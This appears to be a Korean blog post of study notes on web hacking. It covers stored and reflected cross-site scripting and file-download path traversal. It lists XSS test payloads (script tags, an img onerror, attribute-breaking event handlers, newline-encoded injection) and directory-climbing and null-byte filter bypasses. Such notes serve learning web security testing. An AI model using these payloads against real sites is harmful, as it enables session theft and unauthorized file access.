web hacking - 1) 서버에 있는 개인정보 탈취
2) 시스템해킹을 위한 발판
XSS(크로스 사이트 스크립트) - 공격자가 서버를 통해 사용자를 공격
다른 사용자쿠키나 세션아이디를 탈취해서 사용자의 권한을 습득
sotored - 저장되있는 것
(이벤트 핸들러) – 이용 ex)<script>alert(1);</script>
< img src=x onerror=alert(123)>
bob"onmouseover="alert(1)"
밑의 두줄이 한스크립트
‘”a=’
‘onerror=alert(1);>
reflected – 쿠기, 사용자의 값을 서버에 날렸을 때 리턴값으로
‘);alert(‘1
%0aalert(1);/* -> %0a 개행문자 이용
다운로드 취약점
../../target -> 상위 디렉토리로 올라감
../target%00 -> NULL
.\./target
index.php
inext.p<p
index.p>p
구글 해킹 (0) | 2015.11.21 |
---|---|
web 2일차 (0) | 2015.10.23 |
webhacking (0) | 2015.10.16 |
XSS(크로스 사이트 스크립트)? (0) | 2015.09.03 |
What Is A Man In The Middle Attack? 원본 (0) | 2015.09.03 |
What Is A Man In The Middle Attack? (0) | 2015.09.03 |
댓글 영역